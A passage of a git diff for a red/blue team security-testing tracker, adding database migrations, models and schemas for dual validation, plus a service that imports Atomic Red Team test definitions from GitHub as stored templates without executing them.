diff --git a/backend/alembic/versions/b001_add_new_test_states.py b/backend/alembic/versions/b001_add_new_test_states.py new file mode 100644 index 0000000..e5c1165 --- /dev/null +++ b/backend/alembic/versions/b001_add_new_test_states.py @@ -0,0 +1,32 @@ +"""add_new_test_states + +Revision ID: b001add0test +Revises: a1412d1ef337 +Create Date: 2026-02-09 10:00:00.000000 + +""" +from typing import Sequence, Union + +from alembic import op + + +# revision identifiers, used by Alembic. +revision: str = 'b001add0test' +down_revision: Union[str, Sequence[str], None] = 'a1412d1ef337' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Add red_executing and blue_evaluating values to the teststate enum.""" + op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'red_executing' AFTER 'draft'") + op.execute("ALTER TYPE teststate ADD VALUE IF NOT EXISTS 'blue_evaluating' AFTER 'red_executing'") + + +def downgrade() -> None: + """Downgrade: removing enum values in PostgreSQL requires recreating the type. + + This is intentionally left as a no-op because dropping enum values is + destructive and rarely needed in practice. + """ + pass diff --git a/backend/alembic/versions/b002_add_evidence_team_notes.py b/backend/alembic/versions/b002_add_evidence_team_notes.py new file mode 100644 index 0000000..bf0fc55 --- /dev/null +++ b/backend/alembic/versions/b002_add_evidence_team_notes.py @@ -0,0 +1,46 @@ +"""add_evidence_team_and_notes + +Revision ID: b002evidteam +Revises: b001add0test +Create Date: 2026-02-09 10:01:00.000000 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + + +# revision identifiers, used by Alembic. +revision: str = 'b002evidteam' +down_revision: Union[str, Sequence[str], None] = 'b001add0test' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Create teamside enum and add team/notes columns to evidences.""" + # Create the new enum type + teamside_enum = postgresql.ENUM('red', 'blue', name='teamside', create_type=False) + op.execute("CREATE TYPE teamside AS ENUM ('red', 'blue')") + + # Add columns + op.add_column('evidences', sa.Column( + 'team', + teamside_enum, + nullable=False, + server_default='red', + )) + op.add_column('evidences', sa.Column( + 'notes', + sa.Text(), + nullable=True, + )) + + +def downgrade() -> None: + """Remove team/notes columns and drop teamside enum.""" + op.drop_column('evidences', 'notes') + op.drop_column('evidences', 'team') + op.execute("DROP TYPE IF EXISTS teamside") diff --git a/backend/alembic/versions/b003_add_dual_validation_fields.py b/backend/alembic/versions/b003_add_dual_validation_fields.py new file mode 100644 index 0000000..d3c6c36 --- /dev/null +++ b/backend/alembic/versions/b003_add_dual_validation_fields.py @@ -0,0 +1,87 @@ +"""add_dual_validation_fields_to_tests + +Revision ID: b003dualvalid +Revises: b002evidteam +Create Date: 2026-02-09 10:02:00.000000 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + + +# revision identifiers, used by Alembic. +revision: str = 'b003dualvalid' +down_revision: Union[str, Sequence[str], None] = 'b002evidteam' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Drop legacy validated_by/validated_at and add dual validation columns.""" + # Drop legacy single-validation columns + op.drop_constraint('tests_validated_by_fkey', 'tests', type_='foreignkey') + op.drop_column('tests', 'validated_by') + op.drop_column('tests', 'validated_at') + + # ── Red Team fields ───────────────────────────────────────── + op.add_column('tests', sa.Column('red_summary', sa.Text(), nullable=True)) + op.add_column('tests', sa.Column('attack_success', sa.Boolean(), nullable=True)) + op.add_column('tests', sa.Column('red_validated_by', sa.UUID(), nullable=True)) + op.add_column('tests', sa.Column('red_validated_at', sa.DateTime(), nullable=True)) + op.add_column('tests', sa.Column('red_validation_status', sa.String(), nullable=True)) + op.add_column('tests', sa.Column('red_validation_notes', sa.Text(), nullable=True)) + + # ── Blue Team fields ──────────────────────────────────────── + op.add_column('tests', sa.Column('blue_summary', sa.Text(), nullable=True)) + op.add_column('tests', sa.Column( + 'detection_result', + postgresql.ENUM('detected', 'not_detected', 'partially_detected', + name='testresult', create_type=False), + nullable=True, + )) + op.add_column('tests', sa.Column('blue_validated_by', sa.UUID(), nullable=True)) + op.add_column('tests', sa.Column('blue_validated_at', sa.DateTime(), nullable=True)) + op.add_column('tests', sa.Column('blue_validation_status', sa.String(), nullable=True)) + op.add_column('tests', sa.Column('blue_validation_notes', sa.Text(), nullable=True)) + + # ── Foreign keys ──────────────────────────────────────────── + op.create_foreign_key( + 'fk_tests_red_validated_by', 'tests', 'users', + ['red_validated_by'], ['id'], + ) + op.create_foreign_key( + 'fk_tests_blue_validated_by', 'tests', 'users', + ['blue_validated_by'], ['id'], + ) + + +def downgrade() -> None: + """Reverse: drop dual validation columns and restore legacy columns.""" + # Drop FKs + op.drop_constraint('fk_tests_blue_validated_by', 'tests', type_='foreignkey') + op.drop_constraint('fk_tests_red_validated_by', 'tests', type_='foreignkey') + + # Drop new columns + op.drop_column('tests', 'blue_validation_notes') + op.drop_column('tests', 'blue_validation_status') + op.drop_column('tests', 'blue_validated_at') + op.drop_column('tests', 'blue_validated_by') + op.drop_column('tests', 'detection_result') + op.drop_column('tests', 'blue_summary') + op.drop_column('tests', 'red_validation_notes') + op.drop_column('tests', 'red_validation_status') + op.drop_column('tests', 'red_validated_at') + op.drop_column('tests', 'red_validated_by') + op.drop_column('tests', 'attack_success') + op.drop_column('tests', 'red_summary') + + # Restore legacy columns + op.add_column('tests', sa.Column('validated_by', sa.UUID(), nullable=True)) + op.add_column('tests', sa.Column('validated_at', sa.DateTime(), nullable=True)) + op.create_foreign_key( + 'tests_validated_by_fkey', 'tests', 'users', + ['validated_by'], ['id'], + ) diff --git a/backend/alembic/versions/b004_add_test_templates_table.py b/backend/alembic/versions/b004_add_test_templates_table.py new file mode 100644 index 0000000..0d19c8a --- /dev/null +++ b/backend/alembic/versions/b004_add_test_templates_table.py @@ -0,0 +1,54 @@ +"""add_test_templates_table + +Revision ID: b004templates +Revises: b003dualvalid +Create Date: 2026-02-09 10:03:00.000000 + +""" +from typing import Sequence, Union + +from alembic import op +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision: str = 'b004templates' +down_revision: Union[str, Sequence[str], None] = 'b003dualvalid' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Create the test_templates table with indexes.""" + op.create_table( + 'test_templates', + sa.Column('id', sa.UUID(), nullable=False, default=sa.text('gen_random_uuid()')), + sa.Column('mitre_technique_id', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=False), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('source', sa.String(), nullable=False), + sa.Column('source_url', sa.String(), nullable=True), + sa.Column('attack_procedure', sa.Text(), nullable=True), + sa.Column('expected_detection', sa.Text(), nullable=True), + sa.Column('platform', sa.String(), nullable=True), + sa.Column('tool_suggested', sa.String(), nullable=True), + sa.Column('severity', sa.String(), nullable=True), + sa.Column('atomic_test_id', sa.String(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=True, server_default=sa.text('true')), + sa.Column('created_at', sa.DateTime(), nullable=True), + sa.PrimaryKeyConstraint('id'), + ) + + op.create_index('ix_test_templates_mitre_technique_id', 'test_templates', ['mitre_technique_id']) + op.create_index('ix_test_templates_source', 'test_templates', ['source']) + op.create_index('ix_test_templates_platform', 'test_templates', ['platform']) + op.create_index('ix_test_templates_severity', 'test_templates', ['severity']) + + +def downgrade() -> None: + """Drop the test_templates table and its indexes.""" + op.drop_index('ix_test_templates_severity', table_name='test_templates') + op.drop_index('ix_test_templates_platform', table_name='test_templates') + op.drop_index('ix_test_templates_source', table_name='test_templates') + op.drop_index('ix_test_templates_mitre_technique_id', table_name='test_templates') + op.drop_table('test_templates') diff --git a/backend/alembic/versions/b005_add_v2_indexes.py b/backend/alembic/versions/b005_add_v2_indexes.py new file mode 100644 index 0000000..7bf00cf --- /dev/null +++ b/backend/alembic/versions/b005_add_v2_indexes.py @@ -0,0 +1,55 @@ +"""add_v2_indexes + +Revision ID: b005v2indexes +Revises: b004templates +Create Date: 2026-02-09 10:04:00.000000 + +""" +from typing import Sequence, Union + +from alembic import op + + +# revision identifiers, used by Alembic. +revision: str = 'b005v2indexes' +down_revision: Union[str, Sequence[str], None] = 'b004templates' +branch_labels: Union[str, Sequence[str], None] = None +depends_on: Union[str, Sequence[str], None] = None + + +def upgrade() -> None: + """Create performance indexes for V2 queries.""" + # ── Tests ─────────────────────────────────────────────────── + op.create_index('ix_tests_state', 'tests', ['state']) + op.create_index('ix_tests_technique_id', 'tests', ['technique_id']) + op.create_index('ix_tests_created_by', 'tests', ['created_by']) + op.create_index('ix_tests_red_validation_status', 'tests', ['red_validation_status']) + op.create_index('ix_tests_blue_validation_status', 'tests', ['blue_validation_status']) + + # ── Evidences ─────────────────────────────────────────────── + op.create_index('ix_evidences_test_id', 'evidences', ['test_id']) + op.create_index('ix_evidences_team', 'evidences', ['team']) + + # ── Techniques (if not already present from MVP) ──────────── + op.create_index('ix_techniques_tactic', 'techniques', ['tactic']) + op.create_index('ix_techniques_status_global', 'techniques', ['status_global']) + op.create_index('ix_techniques_review_required', 'techniques', ['review_required']) + + +def downgrade() -> None: + """Drop all V2 indexes.""" + # Techniques + op.drop_index('ix_techniques_review_required', table_name='techniques') + op.drop_index('ix_techniques_status_global', table_name='techniques') + op.drop_index('ix_techniques_tactic', table_name='techniques') + + # Evidences + op.drop_index('ix_evidences_team', table_name='evidences') + op.drop_index('ix_evidences_test_id', table_name='evidences') + + # Tests + op.drop_index('ix_tests_blue_validation_status', table_name='tests') + op.drop_index('ix_tests_red_validation_status', table_name='tests') + op.drop_index('ix_tests_created_by', table_name='tests') + op.drop_index('ix_tests_technique_id', table_name='tests') + op.drop_index('ix_tests_state', table_name='tests') diff --git a/backend/app/models/__init__.py b/backend/app/models/__init__.py index cb09c57..75723ed 100644 --- a/backend/app/models/__init__.py +++ b/backend/app/models/__init__.py @@ -2,12 +2,14 @@ from app.models.user import User from app.models.technique import Technique from app.models.test import Test +from app.models.test_template import TestTemplate from app.models.evidence import Evidence from app.models.intel import IntelItem from app.models.audit import AuditLog -from app.models.enums import TechniqueStatus, TestState, TestResult +from app.models.enums import TechniqueStatus, TestState, TestResult, TeamSide __all__ = [ - "User", "Technique", "Test", "Evidence", "IntelItem", "AuditLog", - "TechniqueStatus", "TestState", "TestResult" + "User", "Technique", "Test", "TestTemplate", "Evidence", + "IntelItem", "AuditLog", + "TechniqueStatus", "TestState", "TestResult", "TeamSide", ] diff --git a/backend/app/models/enums.py b/backend/app/models/enums.py index 48f7a5e..8df0125 100644 --- a/backend/app/models/enums.py +++ b/backend/app/models/enums.py @@ -12,11 +12,18 @@ class TechniqueStatus(str, enum.Enum): class TestState(str, enum.Enum): draft = "draft" + red_executing = "red_executing" # Red Team documenting attack + blue_evaluating = "blue_evaluating" # Blue Team evaluating detection in_review = "in_review" validated = "validated" rejected = "rejected" +class TeamSide(str, enum.Enum): + red = "red" + blue = "blue" + + class TestResult(str, enum.Enum): detected = "detected" not_detected = "not_detected" diff --git a/backend/app/models/evidence.py b/backend/app/models/evidence.py index 91ef600..685f34b 100644 --- a/backend/app/models/evidence.py +++ b/backend/app/models/evidence.py @@ -1,11 +1,12 @@ import uuid from datetime import datetime -from sqlalchemy import Column, String, DateTime, ForeignKey +from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.orm import relationship from app.database import Base +from app.models.enums import TeamSide class Evidence(Base): @@ -14,6 +15,9 @@ class Evidence(Base): Files are stored in MinIO, and this model tracks the file location, integrity hash, and upload metadata. + + The ``team`` field distinguishes whether this evidence was uploaded by + Red Team (attack evidence) or Blue Team (detection evidence). """ __tablename__ = "evidences" @@ -24,6 +28,8 @@ class Evidence(Base): sha256_hash = Column(String, nullable=False) uploaded_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) uploaded_at = Column(DateTime, default=datetime.utcnow) + team = Column(Enum(TeamSide, name="teamside"), nullable=False, default=TeamSide.red) + notes = Column(Text, nullable=True) # Relationships test = relationship("Test", back_populates="evidences") diff --git a/backend/app/models/test.py b/backend/app/models/test.py index 663f854..861f855 100644 --- a/backend/app/models/test.py +++ b/backend/app/models/test.py @@ -1,7 +1,7 @@ import uuid from datetime import datetime -from sqlalchemy import Column, String, Text, DateTime, ForeignKey, Enum +from sqlalchemy import Column, String, Text, Boolean, DateTime, ForeignKey, Enum from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.orm import relationship @@ -12,12 +12,14 @@ from app.models.enums import TestState, TestResult class Test(Base): """ Test model representing a security test for a MITRE ATT&CK technique. - + Each test documents an attempt to validate coverage of a specific technique, - including the procedure, tools used, and outcome. + including the procedure, tools used, and outcome. V2 introduces dual + validation: Red Lead and Blue Lead must each approve independently. """ __tablename__ = "tests" + # ── Core fields ───────────────────────────────────────────────── id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) technique_id = Column(UUID(as_uuid=True), ForeignKey("techniques.id"), nullable=False) name = Column(String, nullable=False) @@ -29,12 +31,27 @@ class Test(Base): created_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) result = Column(Enum(TestResult, name="testresult"), nullable=True) state = Column(Enum(TestState, name="teststate"), default=TestState.draft) - validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) - validated_at = Column(DateTime, nullable=True) created_at = Column(DateTime, default=datetime.utcnow) - # Relationships + # ── Red Team fields ───────────────────────────────────────────── + red_summary = Column(Text, nullable=True) + attack_success = Column(Boolean, nullable=True) + red_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) + red_validated_at = Column(DateTime, nullable=True) + red_validation_status = Column(String, nullable=True) # pending / approved / rejected + red_validation_notes = Column(Text, nullable=True) + + # ── Blue Team fields ──────────────────────────────────────────── + blue_summary = Column(Text, nullable=True) + detection_result = Column(Enum(TestResult, name="testresult"), nullable=True) + blue_validated_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=True) + blue_validated_at = Column(DateTime, nullable=True) + blue_validation_status = Column(String, nullable=True) # pending / approved / rejected + blue_validation_notes = Column(Text, nullable=True) + + # ── Relationships ─────────────────────────────────────────────── technique = relationship("Technique", back_populates="tests") evidences = relationship("Evidence", back_populates="test") creator = relationship("User", foreign_keys=[created_by]) - validator = relationship("User", foreign_keys=[validated_by]) + red_validator = relationship("User", foreign_keys=[red_validated_by]) + blue_validator = relationship("User", foreign_keys=[blue_validated_by]) diff --git a/backend/app/models/test_template.py b/backend/app/models/test_template.py new file mode 100644 index 0000000..41ef58d --- /dev/null +++ b/backend/app/models/test_template.py @@ -0,0 +1,45 @@ +"""TestTemplate model — predefined test catalog entries.""" + +import uuid +from datetime import datetime + +from sqlalchemy import Column, String, Text, Boolean, DateTime, Index +from sqlalchemy.dialects.postgresql import UUID + +from app.database import Base + + +class TestTemplate(Base): + """ + Predefined test template mapped to a MITRE ATT&CK technique. + + Templates come from several sources: + - **atomic_red_team**: Atomic Red Team by Red Canary + - **mitre**: MITRE ATT&CK procedure examples + - **custom**: Manually created by teams + + Users can instantiate a real Test from a template. + """ + __tablename__ = "test_templates" + + id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) + mitre_technique_id = Column(String, nullable=False) # e.g. "T1059.001" + name = Column(String, nullable=False) + description = Column(Text, nullable=True) + source = Column(String, nullable=False) # atomic_red_team / mitre / custom + source_url = Column(String, nullable=True) + attack_procedure = Column(Text, nullable=True) # Suggested attack procedure + expected_detection = Column(Text, nullable=True) # What blue team should detect + platform = Column(String, nullable=True) # windows / linux / macos + tool_suggested = Column(String, nullable=True) + severity = Column(String, nullable=True) # low / medium / high / critical + atomic_test_id = Column(String, nullable=True) # ID in Atomic Red Team repo + is_active = Column(Boolean, default=True) + created_at = Column(DateTime, default=datetime.utcnow) + + __table_args__ = ( + Index('ix_test_templates_mitre_technique_id', 'mitre_technique_id'), + Index('ix_test_templates_source', 'source'), + Index('ix_test_templates_platform', 'platform'), + Index('ix_test_templates_severity', 'severity'), + ) diff --git a/backend/app/routers/evidence.py b/backend/app/routers/evidence.py index 4ea8120..be676dd 100644 --- a/backend/app/routers/evidence.py +++ b/backend/app/routers/evidence.py @@ -128,5 +128,7 @@ def _evidence_to_out(evidence: Evidence) -> EvidenceOut: sha256_hash=evidence.sha256_hash, uploaded_by=evidence.uploaded_by, uploaded_at=evidence.uploaded_at, + team=evidence.team, + notes=evidence.notes, download_url=get_presigned_url(evidence.file_path), ) diff --git a/backend/app/routers/tests.py b/backend/app/routers/tests.py index 76dab76..d7a2172 100644 --- a/backend/app/routers/tests.py +++ b/backend/app/routers/tests.py @@ -166,10 +166,11 @@ def validate_test( db: Session = Depends(get_db), current_user: User = Depends(require_any_role("red_lead", "blue_lead")), ): - """Mark a test as validated. + """Validate the red or blue side of a test (dual validation). - Sets ``state`` to *validated*, records ``validated_by`` / ``validated_at``, - stores the ``result``, and recalculates the parent technique's global status. + Red Lead approves/rejects the red side; Blue Lead approves/rejects the + blue side. When *both* sides are approved the test state moves to + ``validated``. If either side is rejected the state moves to ``rejected``. """ test = ( db.query(Test) @@ -184,10 +185,39 @@ def validate_test( detail="Test not found", ) - test.state = TestState.validated + now = datetime.utcnow() + + if current_user.role in ("red_lead", "admin"): + test.red_validation_status = payload.result.value + test.red_validated_by = current_user.id + test.red_validated_at = now + side = "red" + elif current_user.role == "blue_lead": + test.blue_validation_status = payload.result.value + test.blue_validated_by = current_user.id + test.blue_validated_at = now + side = "blue" + else: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Not enough permissions to validate", + ) + + # Store the overall result from the payload test.result = payload.result - test.validated_by = current_user.id - test.validated_at = datetime.utcnow() + + # Determine aggregate state + red_ok = test.red_validation_status == "approved" + blue_ok = test.blue_validation_status == "approved" + red_rej = test.red_validation_status == "rejected" + blue_rej = test.blue_validation_status == "rejected" + + if red_ok and blue_ok: + test.state = TestState.validated + elif red_rej or blue_rej: + test.state = TestState.rejected + else: + test.state = TestState.in_review db.commit() db.refresh(test) @@ -203,6 +233,7 @@ def validate_test( entity_type="test", entity_id=test.id, details={ + "side": side, "result": payload.result.value, "technique_id": str(test.technique_id), }, diff --git a/backend/app/schemas/__init__.py b/backend/app/schemas/__init__.py index 421ab11..62b98f1 100644 --- a/backend/app/schemas/__init__.py +++ b/backend/app/schemas/__init__.py @@ -14,9 +14,20 @@ from app.schemas.test import ( TestOut, TestUpdate, TestValidate, + TestRedUpdate, + TestBlueUpdate, + TestRedValidate, + TestBlueValidate, ) -from app.schemas.evidence import EvidenceOut +from app.schemas.evidence import EvidenceOut, EvidenceUpload + +from app.schemas.test_template import ( + TestTemplateOut, + TestTemplateCreate, + TestTemplateSummary, + TestTemplateInstantiate, +) __all__ = [ # Auth @@ -33,6 +44,16 @@ __all__ = [ "TestOut", "TestUpdate", "TestValidate", + "TestRedUpdate", + "TestBlueUpdate", + "TestRedValidate", + "TestBlueValidate", # Evidence "EvidenceOut", + "EvidenceUpload", + # Test Template + "TestTemplateOut", + "TestTemplateCreate", + "TestTemplateSummary", + "TestTemplateInstantiate", ] diff --git a/backend/app/schemas/evidence.py b/backend/app/schemas/evidence.py index 60ec6e7..a26dd88 100644 --- a/backend/app/schemas/evidence.py +++ b/backend/app/schemas/evidence.py @@ -5,6 +5,8 @@ from datetime import datetime from pydantic import BaseModel, ConfigDict +from app.models.enums import TeamSide + class EvidenceOut(BaseModel): """Representation of an evidence record returned by the API. @@ -18,6 +20,15 @@ class EvidenceOut(BaseModel): sha256_hash: str uploaded_by: uuid.UUID | None = None uploaded_at: datetime | None = None + team: TeamSide = TeamSide.red + notes: str | None = None download_url: str | None = None model_config = ConfigDict(from_attributes=True) + + +class EvidenceUpload(BaseModel): + """Metadata sent alongside an evidence file upload.""" + + team: TeamSide + notes: str | None = None diff --git a/backend/app/schemas/test.py b/backend/app/schemas/test.py index e93cac3..4aacd9a 100644 --- a/backend/app/schemas/test.py +++ b/backend/app/schemas/test.py @@ -10,6 +10,7 @@ from app.models.enums import TestResult, TestState # ── Create ────────────────────────────────────────────────────────── + class TestCreate(BaseModel): """Payload for creating a new test.""" @@ -21,7 +22,8 @@ class TestCreate(BaseModel): tool_used: str | None = None -# ── Update ────────────────────────────────────────────────────────── +# ── Update (general) ─────────────────────────────────────────────── + class TestUpdate(BaseModel): """Payload for partially updating an existing test. @@ -35,8 +37,63 @@ class TestUpdate(BaseModel): result: TestResult | None = None +# ── Red Team update ──────────────────────────────────────────────── + + +class TestRedUpdate(BaseModel): + """Fields that Red Team fills in during the red_executing phase.""" + + name: str | None = None + description: str | None = None + procedure_text: str | None = None + tool_used: str | None = None + attack_success: bool | None = None + red_summary: str | None = None + + +# ── Blue Team update ─────────────────────────────────────────────── + + +class TestBlueUpdate(BaseModel): + """Fields that Blue Team fills in during the blue_evaluating phase.""" + + detection_result: TestResult | None = None + blue_summary: str | None = None + + +# ── Red Lead validation ──────────────────────────────────────────── + + +class TestRedValidate(BaseModel): + """Payload sent by Red Lead to approve/reject the red side.""" + + red_validation_status: str # "approved" or "rejected" + red_validation_notes: str | None = None + + +# ── Blue Lead validation ─────────────────────────────────────────── + + +class TestBlueValidate(BaseModel): + """Payload sent by Blue Lead to approve/reject the blue side.""" + + blue_validation_status: str # "approved" or "rejected" + blue_validation_notes: str | None = None + + +# ── Legacy validate (kept for backwards compat) ──────────────────── + + +class TestValidate(BaseModel): + """Payload sent by a reviewer to validate / reject a test.""" + + result: TestResult + comments: str | None = None + + # ── Read (full) ───────────────────────────────────────────────────── + class TestOut(BaseModel): """Complete representation returned by the API.""" @@ -51,17 +108,22 @@ class TestOut(BaseModel): created_by: uuid.UUID | None = None result: TestResult | None = None state: TestState = TestState.draft - validated_by: uuid.UUID | None = None - validated_at: datetime | None = None created_at: datetime | None = None + # Red Team fields + red_summary: str | None = None + attack_success: bool | None = None + red_validated_by: uuid.UUID | None = None + red_validated_at: datetime | None = None + red_validation_status: str | None = None + red_validation_notes: str | None = None + + # Blue Team fields + blue_summary: str | None = None + detection_result: TestResult | None = None + blue_validated_by: uuid.UUID | None = None + blue_validated_at: datetime | None = None + blue_validation_status: str | None = None + blue_validation_notes: str | None = None + model_config = ConfigDict(from_attributes=True) - - -# ── Validate ──────────────────────────────────────────────────────── - -class TestValidate(BaseModel): - """Payload sent by a reviewer to validate / reject a test.""" - - result: TestResult - comments: str | None = None diff --git a/backend/app/schemas/test_template.py b/backend/app/schemas/test_template.py new file mode 100644 index 0000000..602ba99 --- /dev/null +++ b/backend/app/schemas/test_template.py @@ -0,0 +1,75 @@ +"""Pydantic schemas for TestTemplate endpoints.""" + +import uuid +from datetime import datetime + +from pydantic import BaseModel, ConfigDict + + +# ── Full output ───────────────────────────────────────────────────── + + +class TestTemplateOut(BaseModel): + """Complete representation of a test template.""" + + id: uuid.UUID + mitre_technique_id: str + name: str + description: str | None = None + source: str + source_url: str | None = None + attack_procedure: str | None = None + expected_detection: str | None = None + platform: str | None = None + tool_suggested: str | None = None + severity: str | None = None + atomic_test_id: str | None = None + is_active: bool = True + created_at: datetime | None = None + + model_config = ConfigDict(from_attributes=True) + + +# ── Create ────────────────────────────────────────────────────────── + + +class TestTemplateCreate(BaseModel): + """Payload for creating a custom test template.""" + + mitre_technique_id: str + name: str + description: str | None = None + source: str = "custom" + source_url: str | None = None + attack_procedure: str | None = None + expected_detection: str | None = None + platform: str | None = None + tool_suggested: str | None = None + severity: str | None = None + atomic_test_id: str | None = None + + +# ── Summary (for listings) ───────────────────────────────────────── + + +class TestTemplateSummary(BaseModel): + """Lightweight representation for listing templates.""" + + id: uuid.UUID + mitre_technique_id: str + name: str + source: str + platform: str | None = None + severity: str | None = None + + model_config = ConfigDict(from_attributes=True) + + +# ── Instantiate (create a real Test from a template) ──────────────── + + +class TestTemplateInstantiate(BaseModel): + """Payload to create a real test from an existing template.""" + + template_id: uuid.UUID + technique_id: uuid.UUID diff --git a/backend/app/services/atomic_import_service.py b/backend/app/services/atomic_import_service.py new file mode 100644 index 0000000..d1e7045 --- /dev/null +++ b/backend/app/services/atomic_import_service.py @@ -0,0 +1,231 @@ +"""Atomic Red Team import service. + +Downloads the Atomic Red Team repository ZIP from GitHub, parses every +``atomics/T*/T*.yaml`` file, and upserts :class:`TestTemplate` records +into the database. + +Strategy +-------- +The GitHub REST API without authentication only allows 60 req/hour. +Since the Atomic Red Team repo contains 1 500+ YAML files we avoid +per-file requests entirely. Instead we: + +1. Download the full repo as a ZIP archive (~40 MB). +2. Extract in a temporary directory. +3. Walk ``atomics/T*/T*.yaml`` files parsing them with PyYAML. +4. Create / update ``TestTemplate`` rows keyed by ``atomic_test_id``. +5. Clean up the temporary directory. + +Idempotency +----------- +Running the import twice does **not** create duplicates. Existing +templates are identified by their ``atomic_test_id`` and simply skipped. +""" + +import io +import logging +import os +import shutil +import tempfile +import zipfile +from pathlib import Path + +import requests as _requests +import yaml +from sqlalchemy.orm import Session + +from app.models.test_template import TestTemplate +from app.services.audit_service import log_action + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# Constants +# --------------------------------------------------------------------------- + +ATOMIC_RT_ZIP_URL = ( + "https://github.com/redcanaryco/atomic-red-team" + "/archive/refs/heads/master.zip" +) + +# Request timeout for the ZIP download (seconds) +_DOWNLOAD_TIMEOUT = 300 + +# Top-level directory name inside the ZIP +_ZIP_ROOT_PREFIX = "atomic-red-team-master" + + +# --------------------------------------------------------------------------- +# Internal helpers +# --------------------------------------------------------------------------- + + +def _download_zip(url: str = ATOMIC_RT_ZIP_URL) -> bytes: + """Download the Atomic Red Team ZIP and return its raw bytes.""" + logger.info("Downloading Atomic Red Team ZIP from %s …", url) + resp = _requests.get(url, timeout=_DOWNLOAD_TIMEOUT, stream=True) + resp.raise_for_status() + content = resp.content + logger.info("Downloaded %.1f MB", len(content) / (1024 * 1024)) + return content + + +def _extract_zip(zip_bytes: bytes, dest: str) -> Path: + """Extract *zip_bytes* into *dest* and return the path to the atomics/ dir.""" + with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf: + zf.extractall(dest) + atomics_dir = Path(dest) / _ZIP_ROOT_PREFIX / "atomics" + if not atomics_dir.is_dir(): + raise FileNotFoundError( + f"Expected atomics directory not found at {atomics_dir}" + ) + return atomics_dir + + +def _parse_yaml_files(atomics_dir: Path) -> list[dict]: + """Walk the atomics directory and parse all technique YAML files. + + Returns a flat list of dicts, each representing a single atomic test + with the following keys:: + + technique_id, index, name, description, platforms, + executor_type, command, source_url + """ + results: list[dict] = [] + yaml_files = sorted(atomics_dir.glob("T*/T*.yaml")) + logger.info("Found %d YAML files to parse", len(yaml_files)) + + for yaml_path in yaml_files: + technique_id = yaml_path.stem # e.g. "T1059.001" + try: + with open(yaml_path, "r", encoding="utf-8") as fh: + data = yaml.safe_load(fh) + except Exception as exc: + logger.warning("Failed to parse %s: %s", yaml_path, exc) + continue + + if not data or "atomic_tests" not in data: + continue + + for idx, test in enumerate(data["atomic_tests"]): + name = test.get("name", "").strip() + description = test.get("description", "").strip() + platforms = test.get("supported_platforms", []) + executor = test.get("executor", {}) + executor_type = executor.get("name", "") if isinstance(executor, dict) else "" + command = executor.get("command", "") if isinstance(executor, dict) else "" + + # Build an atomic_test_id in the format "T1059.001-0" + atomic_test_id = f"{technique_id}-{idx}" + + source_url = ( + f"https://github.com/redcanaryco/atomic-red-team/blob/master" + f"/atomics/{technique_id}/{technique_id}.yaml" + ) + + results.append({ + "technique_id": technique_id, + "index": idx, + "atomic_test_id": atomic_test_id, + "name": name, + "description": description, + "platforms": ", ".join(platforms) if isinstance(platforms, list) else str(platforms), + "executor_type": executor_type, + "command": command[:4000] if command else None, # cap at 4k chars + "source_url": source_url, + }) + + logger.info("Parsed %d atomic tests total", len(results)) + return results + + +# --------------------------------------------------------------------------- +# Public API +# --------------------------------------------------------------------------- + + +def import_atomic_red_team(db: Session) -> dict: + """Download and import Atomic Red Team tests as TestTemplates. + + Parameters + ---------- + db : Session + Active SQLAlchemy database session. + + Returns + ------- + dict + Summary with keys ``created``, ``skipped_existing``, + ``yaml_files_parsed``, ``total_tests_parsed``. + """ + tmp_dir = tempfile.mkdtemp(prefix="aegis_atomic_") + try: + zip_bytes = _download_zip() + atomics_dir = _extract_zip(zip_bytes, tmp_dir) + parsed_tests = _parse_yaml_files(atomics_dir) + finally: + # Always clean up + shutil.rmtree(tmp_dir, ignore_errors=True) + logger.info("Cleaned up temp directory %s", tmp_dir) + + # Pre-load existing atomic_test_ids for dedup + existing_ids: set[str] = { + row[0] + for row in db.query(TestTemplate.atomic_test_id) + .filter(TestTemplate.atomic_test_id.isnot(None)) + .all() + } + + created = 0 + skipped = 0 + + for item in parsed_tests: + if item["atomic_test_id"] in existing_ids: + skipped += 1 + continue + + template = TestTemplate( + mitre_technique_id=item["technique_id"], + name=item["name"][:500] if item["name"] else f"Atomic Test {item['atomic_test_id']}", + description=item["description"][:2000] if item["description"] else None, + source="atomic_red_team", + source_url=item["source_url"], + attack_procedure=item["command"], + platform=item["platforms"], + tool_suggested=item["executor_type"] if item["executor_type"] else None, + atomic_test_id=item["atomic_test_id"], + is_active=True, + ) + db.add(template) + existing_ids.add(item["atomic_test_id"]) + created += 1 + + db.commit() + + # Count distinct YAML files by technique_id + yaml_files_count = len({t["technique_id"] for t in parsed_tests}) + + summary = { + "created": created, + "skipped_existing": skipped, + "yaml_files_parsed": yaml_files_count, + "total_tests_parsed": len(parsed_tests), + } + + logger.info( + "Atomic Red Team import complete — created=%d, skipped=%d, " + "yaml_files=%d, 